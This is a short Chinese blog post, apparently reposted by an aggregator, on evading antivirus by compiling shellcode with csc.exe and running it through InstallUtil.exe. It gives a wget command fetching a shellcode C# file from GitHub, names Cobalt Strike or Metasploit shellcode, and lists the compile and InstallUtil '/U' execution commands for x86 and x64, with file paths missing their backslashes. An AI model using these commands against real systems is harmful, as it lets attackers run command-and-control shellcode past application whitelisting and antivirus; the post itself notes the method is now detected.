payload免杀之Installutil.exe&csc.exe利用
Posted whoami101
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了payload免杀之Installutil.exe&csc.exe利用相关的知识,希望对你有一定的参考价值。
0x00 前言
C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。
0x01 利用过程
1.下载shellcode.cs
wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-cs
我这里使用cobalt strike的shellcode,你也可以使用msf的shellcode,命令如下:
2.编译并执行
C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs
C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
或者 C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
绕过的流程图
但是现实很骨感。已经被某60杀了。
以上是关于payload免杀之Installutil.exe&csc.exe利用的主要内容,如果未能解决你的问题,请参考以下文章
远控免杀专题(55)-白名单Pcalua.exe执行payload